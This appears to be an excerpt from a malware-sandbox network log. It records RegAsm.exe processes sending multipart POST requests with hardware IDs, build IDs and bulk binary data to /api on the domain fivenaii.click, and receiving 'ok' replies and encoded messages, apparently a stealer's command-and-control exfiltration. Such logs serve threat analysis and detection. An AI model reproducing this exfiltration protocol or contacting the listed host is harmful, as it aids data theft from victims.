                                                                                              2024-12-27 21:33:27 UTC15331OUTData Raw: 5e 2f ee d1 e0 08 ef 1c 65 3a ef 2a 4f a1 ef c5 1e c3 50 4b af ee 2d 9a a8 3a 34 52 dc a0 7d 72 10 21 ee ee 1d a0 fa 42 97 d3 ef 2d 43 8a be fa ed 49 89 ed d2 57 7b ea c5 a5 67 57 c3 80 6d 0c 6a 8e 6d d6 9a 57 02 30 d4 df 77 3f 1e 79 c5 74 e9 0b ce 40 1d 68 99 6f de f7 68 9d 70 35 5c 29 35 c5 db 3a 18 e5 bf bb 36 f5 17 41 37 45 50 fc 45 ec 80 2f 38 63 f3 5f d1 e4 e8 f5 8e 3a a3 9c a5 89 66 ab ed a5 a2 8f 4e bc e4 68 f9 dd 25 35 9f b8 66 3b e7 c3 af 17 de fb ef 65 c8 0e 0b de a1 b8 7d 40 f7 22 3f 3f e4 48 3f 20 fc 57 4b 49 dd dc e4 5c a4 ba 86 2e d9 7d bc d1 1b b5 24 72 13 ed 71 cf 35 49 28 a9 41 4f d0 cc 05 8c b5 a9 31 95 ba bd 05 c1 b5 25 d8 79 94 ba 79 5c 86 4e 18 dc f2 bb 73 f2 73 37 8e d9 d3 7e b4 24 6d e1 11 65 6f 77 fb c7 b9 d4 ca 1f 1c 83 38 0b 8a
                                                                                              Data Ascii: ^/e:*OPK-:4R}r!B-CIW{gWmjmW0w?yt@hohp5\)5:6A7EPE/8c_:fNh%5f;e}@"??H? WKI\.}$rq5I(AO1%yy\Nss7~$meow8
                                                                                              2024-12-27 21:33:27 UTC15331OUTData Raw: 2b 12 55 1f de bb 6c 06 4c 0f e3 cd 08 e2 bb 5d 01 a1 65 8d 5b ca 0c e9 87 c4 e9 c5 4c de 84 4d f5 fd b9 38 b8 79 50 47 b8 cb 57 eb 34 c7 47 ca 68 bc cd c1 ab 9c 9c b3 e0 35 34 f2 42 75 a9 36 b9 aa 2c 09 1d 7b 40 75 c4 82 63 13 bc df d9 45 5e 6c f7 ce 9e 56 a6 db 43 6e b3 66 65 de 93 bf c7 4a 32 e0 55 81 9b d5 19 ae b9 10 6f 19 d1 8b 30 98 e3 82 3f cc 18 dc dc 8b 10 02 46 13 b9 50 1d 11 e8 bd 3e c3 47 1c 1c 57 b3 d9 81 3c 0f a5 37 44 fd af 4c da 22 83 02 6e 7b 4d 3a 15 dd 47 82 0f f7 32 9b 78 c0 10 c5 71 d4 5a d5 05 23 bc f3 ee fd a7 c3 ef b5 4d fd b5 24 1d ee 1f 91 b4 b9 a7 f2 5e d9 9c 94 ee 87 fe fb 80 d6 b4 70 32 61 05 62 f8 27 52 f9 fe ff af e4 86 24 28 1d e3 81 f3 c0 e2 9f 81 4b 32 8b 6f 84 18 55 e5 94 94 16 64 31 fc 79 b1 e4 51 11 0f 07 e1 3c d5 fe
                                                                                              Data Ascii: +UlL]e[LM8yPGW4Gh54Bu6,{@ucE^lVCnfeJ2Uo0?FP>GW<7DL"n{M:G2xqZ#M$^p2ab'R$(K2oUd1yQ<
                                                                                              2024-12-27 21:33:27 UTC15331OUTData Raw: be 59 b3 b9 42 56 c2 50 20 c8 0c 39 a5 d8 68 e9 99 1d 29 5b 0a d0 bd 3d bc a6 bd 64 7b 2b b1 42 b8 41 90 d2 e4 c6 f7 72 e2 6c e7 e4 d2 da 90 8d 5b c5 fc 3a b3 08 39 a7 3a 09 e1 a6 72 64 85 45 e3 e7 e5 1a 6c b5 7c a1 8b 3d a1 40 ee 59 54 21 a9 d1 c0 c0 57 e0 c7 c1 96 40 aa ba 72 ab b7 76 6d 02 14 ef bd ed f3 2c 4d 0b 19 58 b0 fd 6a 47 ad 88 b5 0c 23 00 b1 ab d6 19 a5 1c ae cf b1 ed e2 98 d2 2f 84 01 41 37 c6 ee f1 f5 dc 3f 72 77 6b d2 a9 5e b1 bb c8 d9 a3 2d 59 a8 44 25 da 50 cc 7e bc ef f2 47 23 9b 6f fa 9e 05 82 86 1a 4d 61 5b 7c 61 a7 db f8 8a f3 0d 67 1d 63 7b 2b b6 1f fc 08 32 fc 21 74 ce 59 f6 57 5d e2 33 e8 77 09 36 b7 32 11 43 00 0f 86 0a e8 ad 6d 83 f2 b6 dc 1f ae 90 70 36 a2 77 10 b7 7e 8b 5e 70 54 e7 f0 96 3e ee 10 c7 1f 35 b1 75 94 5e 64 66 40
                                                                                              Data Ascii: YBVP 9h)[=d{+BArl[:9:rdEl|=@YT!W@rvm,MXjG#/A7?rwk^-YD%P~G#oMa[|agc{+2!tYW]3w62Cmp6w~^pT>5u^df@
                                                                                              2024-12-27 21:33:27 UTC15331OUTData Raw: b7 7d 26 64 c7 eb 25 b0 87 36 b9 eb 75 52 85 c5 72 5f 94 b2 7f ac 99 e0 72 2e 90 21 62 31 1b 89 3c 84 91 e5 6d 96 b5 0b 99 5e ff 59 4e 91 13 25 ef ea 7a ce 2a f9 ff da 2a 7e e2 64 11 f0 f5 ce e1 bc b8 2a 8f 37 fb da 02 e3 74 fb be 21 f1 ee dc b7 aa ac 61 89 26 d8 85 53 25 c8 48 41 90 87 0e ac 2e cd 48 4a e3 04 21 37 50 e7 36 53 90 ba 9b 0d 9b 28 77 b8 55 f5 50 f4 c7 45 40 58 f5 0e 02 b7 70 32 b3 99 13 1c a8 92 ff 6d d9 2b 1b 1f bd 64 c0 b5 3b cb 43 b2 5e a6 fe f5 af 8f 1f 21 7f ec 8c cf 06 12 c4 7b 6f e0 16 71 c8 f2 5b 8e 69 ee 73 25 f1 d5 78 45 2b 5a 12 63 fd 67 26 3e f2 c9 66 68 0a 22 f9 36 0b b3 39 6e 4b 1a 4a 28 d0 46 c2 cd 07 ac 48 13 74 56 ee ac 96 7e 9b 8f 66 fd 8c 12 bd 89 06 b8 cd d5 9f 69 2c 9f 21 04 fd da e8 d2 e3 9c 7b 81 4c 76 80 73 f5 8f 6b
                                                                                              Data Ascii: }&d%6uRr_r.!b1<m^YN%z**~d*7t!a&S%HA.HJ!7P6S(wUPE@Xp2m+d;C^!{oq[is%xE+Zcg&>fh"69nKJ(FHtV~fi,!{Lvsk
                                                                                              2024-12-27 21:33:27 UTC15331OUTData Raw: 4c 5d c1 5f 43 f9 21 6d 0a 66 b2 e8 78 91 61 14 c8 ee 4b 78 48 a9 87 95 f8 81 b5 11 b3 ee 0e 92 a0 fb 0e f5 27 91 10 22 87 98 77 a2 1e 08 98 83 d7 0d e7 af 85 c2 84 e7 21 fa fc 89 8b 43 15 0e a3 79 e9 04 11 4d 86 42 ba e2 6b 72 82 a7 29 6c 5a 0f 97 49 75 51 b9 ef a6 6d 2e 86 61 60 02 d9 99 ef 57 fb 7f db d3 5a f4 32 7f 24 6c 02 9e 03 73 cf 51 b0 ec fc 99 f1 17 58 98 0f c7 bb 28 8d ed 1c 9f 98 73 65 db 0f 44 1a 10 b5 51 66 62 7d 45 37 ec 6b 5d 94 d2 e7 c6 53 cc 2e 28 5e 52 ca 30 98 53 6f 73 8d b5 af 21 ca 87 ea 5d 12 8c 27 f3 03 5e 81 f5 d8 aa a3 ae f5 9d 66 4d e3 fb 43 1c a5 02 90 98 55 be a2 5e fa 03 4f 7f 12 f6 fa be 45 6f 28 19 d9 9d 1a d7 52 c3 7b 22 1a 68 36 9f 06 bf 95 af ea 97 78 72 5e 94 3d 38 3e 2c d1 ef b4 e9 fc 2f e2 09 a5 70 ff 54 fd 55 01 52
                                                                                              Data Ascii: L]_C!mfxaKxH'"w!CyMBkr)lZIuQm.a`WZ2$lsQX(seDQfb}E7k]S.(^R0Sos!]'^fMCU^OEo(R{"h6xr^=8>,/pTUR
                                                                                              2024-12-27 21:33:27 UTC15331OUTData Raw: 8b 21 b8 fa 51 92 f5 f1 e3 2e c9 c4 d2 7d 5d bf f3 c7 9f a1 4b 98 ee eb 27 7d 7b a2 0a 35 2f 12 f7 f7 00 fa 60 26 42 4b 82 98 f9 b2 a0 ea f2 7e 00 ff cb 0b a2 0d 26 dd 2b 73 d6 5e 26 b6 90 b5 b1 5c 07 d4 77 4d 1e 81 ed 66 0e 33 52 e0 ea 6e 53 79 88 14 0f 07 21 cb 84 33 2c dd 47 93 e1 d7 64 5e 8c 5d 90 c4 12 a7 f8 3a 7e 25 f8 2d 08 b7 12 10 91 6e 7e 1e f3 0f 54 b8 73 7b 2a d4 3b 1d 3a 96 20 cb 6c 5c a7 89 e0 77 c9 c2 ef 00 ca 6d 28 29 76 eb e0 f3 10 22 fe 06 e3 62 b2 ed 6c 77 d1 b0 1e 5b 46 58 c8 8d 7b f0 da 68 81 70 94 4a 27 e0 4e cc 85 1f 25 c0 5a 86 bf e6 98 9c 57 3a 6d 0d d1 12 a2 42 90 f2 46 a0 0e 55 98 20 42 27 ec bb 54 ff 00 e2 87 f8 f8 05 25 be d5 1c 78 14 2b ff f4 13 38 d0 fb b5 29 1f 65 d6 10 2c c1 79 03 d2 9f 04 ab 22 68 c1 ae 31 8d 2f 9e 0c aa
                                                                                              Data Ascii: !Q.}]K'}{5/`&BK~&+s^&\wMf3RnSy!3,Gd^]:~%-n~Ts{*;: l\wm()v"blw[FX{hpJ'N%ZW:mBFU B'T%x+8)e,y"h1/
                                                                                              2024-12-27 21:33:27 UTC15331OUTData Raw: 0f c7 00 9f c9 3e 97 10 4a 30 e7 f9 7a 3f b9 3e 42 2d 55 e9 b0 b6 b4 72 9d d6 78 39 f3 f7 93 73 a1 ed fb 02 38 47 cd 56 bc 10 1b 80 7d b4 45 ba ff 3f 40 99 7d ae f5 a8 d0 18 a4 9b 33 36 f4 f6 3f dd 3e 0e 1b df 05 75 0b b2 f9 e7 aa ef 1f be 25 41 d8 6e 14 c0 ed 85 c8 fc 50 c6 9e e8 a1 d8 7c 23 3b 14 0c 87 d9 ee de 66 e9 cf 59 b7 7e 06 d7 87 f0 72 a7 b0 ec 82 ec a3 fb a5 99 b7 1a d4 6c 4e 23 6b 1b e3 be bf f4 cd f1 52 00 7b f0 9c 80 c8 aa c5 18 a9 93 4e be dc 0f cd ae 0e b2 b4 a2 09 0b 7e b2 38 e7 f1 57 f3 db 00 3f 81 f8 6b 84 18 84 0b c6 6d fd 7a 76 69 34 49 84 e2 0b 99 3b e6 67 20 64 1e d6 8b ee 10 6c ca d2 3a 04 0e 5b a7 d7 d6 18 ad 06 a6 35 a1 4d 4b 31 fc f4 46 1e 8a b9 49 31 f7 3c cb 5a 4f fa 74 3d 8d 17 4c 6e a0 67 ec 40 d3 2f 61 8d 05 ca eb a4 5a d9
                                                                                              Data Ascii: >J0z?>B-Urx9s8GV}E?@}36?>u%AnP|#;fY~rlN#kR{N~8W?kmzvi4I;g dl:[5MK1FI1<ZOt=Lng@/aZ
                                                                                              2024-12-27 21:33:30 UTC1133INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=sa8pss3mteljm797ofbhllpf11; expires=Tue, 22 Apr 2025 15:20:08 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FkrFrS3SlD%2FAu7i8zLMCCLTVsgOAL8gy6hVCkE6gKtLq6cLTGDcMTjPokziy3x6ixg9O%2FdrjoUYSoqHB5yjeqef4PhaSy6OxxsEOPvKtIlY0KqqX%2FhHiJBfV0eF38F1vVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6dd97c4ff793-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1675&rtt_var=684&sent=211&recv=590&lost=0&retrans=0&sent_bytes=2833&recv_bytes=573678&delivery_rate=1536842&cwnd=152&unsent_bytes=0&cid=093b464db77e83b8&ts=2354&x=0"


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              18192.168.2.449766104.21.60.244437548C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:30 UTC281OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=XMTXEG4X2SM0IQWLM8F
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 20448
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:30 UTC15331OUTData Raw: 2d 2d 58 4d 54 58 45 47 34 58 32 53 4d 30 49 51 57 4c 4d 38 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 58 4d 54 58 45 47 34 58 32 53 4d 30 49 51 57 4c 4d 38 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 58 4d 54 58 45 47 34 58 32 53 4d 30 49 51 57 4c 4d 38 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 54 65
                                                                                              Data Ascii: --XMTXEG4X2SM0IQWLM8FContent-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--XMTXEG4X2SM0IQWLM8FContent-Disposition: form-data; name="pid"3--XMTXEG4X2SM0IQWLM8FContent-Disposition: form-data; name="lid"VC6Dfm--Te
                                                                                              2024-12-27 21:33:30 UTC5117OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: `M?lrQMn 64F6(X&7~
                                                                                              2024-12-27 21:33:31 UTC1127INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:30 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=fhlnsd2126hhmb9f1juk6v6os0; expires=Tue, 22 Apr 2025 15:20:09 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=axBNTDTG4qEYlasEmtRNcXJ2rObzr1bv01YoS%2F%2BFUlJI5b1LMykVRfu3NtoAOpvHHETlrUvaWLdN4ZgMvnueJaF0O6qA4PLR0SKjT7AESiEPJPXiJvUzhvYmxpAyFY93yQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6de8fd984368-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1651&rtt_var=638&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2833&recv_bytes=21409&delivery_rate=1689814&cwnd=233&unsent_bytes=0&cid=98277ed075e584d7&ts=903&x=0"
                                                                                              2024-12-27 21:33:31 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 21:33:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              19192.168.2.449767104.21.60.244437552C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:31 UTC262OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 87
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:31 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 26 6a 3d 26 68 77 69 64 3d 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33
                                                                                              Data Ascii: act=get_message&ver=4.0&lid=VC6Dfm--TestOtctuk&j=&hwid=B9B295F31A84D198BEBA0C6A975F1733
                                                                                              2024-12-27 21:33:32 UTC1130INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=6ugm2m9t5b0p84fhrccjhh5n97; expires=Tue, 22 Apr 2025 15:20:11 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3brHd0p12uSRVdf%2FFox%2BuA7bcsmQIsDZfNamAv9Kq9McC3UJ%2FxN3mJabeWD7uznD3nPyDttW4wzwzxN2RHzNtqxhmvdSGOvDr8%2Fs12BmO3ffsheyofJeJQ%2FmsnNpkiBalg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6df1fc907cee-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2013&min_rtt=2007&rtt_var=766&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=985&delivery_rate=1416100&cwnd=176&unsent_bytes=0&cid=30afc07c4037611e&ts=1084&x=0"
                                                                                              2024-12-27 21:33:32 UTC54INData Raw: 33 30 0d 0a 61 78 65 2f 56 33 57 44 38 2f 2f 55 48 4f 43 46 6d 42 57 69 34 69 77 4f 71 62 45 75 6f 6e 2b 53 67 6e 6d 79 62 56 41 2f 51 69 45 77 53 67 3d 3d 0d 0a
                                                                                              Data Ascii: 30axe/V3WD8//UHOCFmBWi4iwOqbEuon+SgnmybVA/QiEwSg==
                                                                                              2024-12-27 21:33:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              20192.168.2.449768104.21.60.244437548C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:33 UTC276OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=5Q02JBRDU7U42EA
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1231
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:33 UTC1231OUTData Raw: 2d 2d 35 51 30 32 4a 42 52 44 55 37 55 34 32 45 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 35 51 30 32 4a 42 52 44 55 37 55 34 32 45 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 51 30 32 4a 42 52 44 55 37 55 34 32 45 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 0d 0a 2d 2d
                                                                                              Data Ascii: --5Q02JBRDU7U42EAContent-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--5Q02JBRDU7U42EAContent-Disposition: form-data; name="pid"1--5Q02JBRDU7U42EAContent-Disposition: form-data; name="lid"VC6Dfm--TestOtctuk--
                                                                                              2024-12-27 21:33:33 UTC1134INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=2961mel39jv51m3357rbrppf0p; expires=Tue, 22 Apr 2025 15:20:12 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5pdmvEnhT5m%2FlT2wCn73Q6NBRcXX35ceR3q%2Fs5KO0eD0eO5ky%2FS98w83zXfEFGHARcYQpXDQaTUx4I6QXFg6Pvk1T62SI0zb1l%2BRkQt%2F5m%2Fl9e83kkJ4085B%2FNBXLIVYbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6dfac9f043f7-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1724&min_rtt=1715&rtt_var=650&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2143&delivery_rate=1702623&cwnd=213&unsent_bytes=0&cid=fb4511f71de65859&ts=806&x=0"
                                                                                              2024-12-27 21:33:33 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 21:33:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              21192.168.2.449769104.21.60.244432196C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:33 UTC278OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=6DGF095Y82K79M6X
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 18156
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:33 UTC15331OUTData Raw: 2d 2d 36 44 47 46 30 39 35 59 38 32 4b 37 39 4d 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 36 44 47 46 30 39 35 59 38 32 4b 37 39 4d 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 44 47 46 30 39 35 59 38 32 4b 37 39 4d 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 0d
                                                                                              Data Ascii: --6DGF095Y82K79M6XContent-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--6DGF095Y82K79M6XContent-Disposition: form-data; name="pid"2--6DGF095Y82K79M6XContent-Disposition: form-data; name="lid"VC6Dfm--TestOtctuk
                                                                                              2024-12-27 21:33:33 UTC2825OUTData Raw: 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af
                                                                                              Data Ascii: 5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6
                                                                                              2024-12-27 21:33:34 UTC1140INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=g6a09jg3c8f8j2n97ohah64shq; expires=Tue, 22 Apr 2025 15:20:12 GMT; Max-Age=9999999; path=/
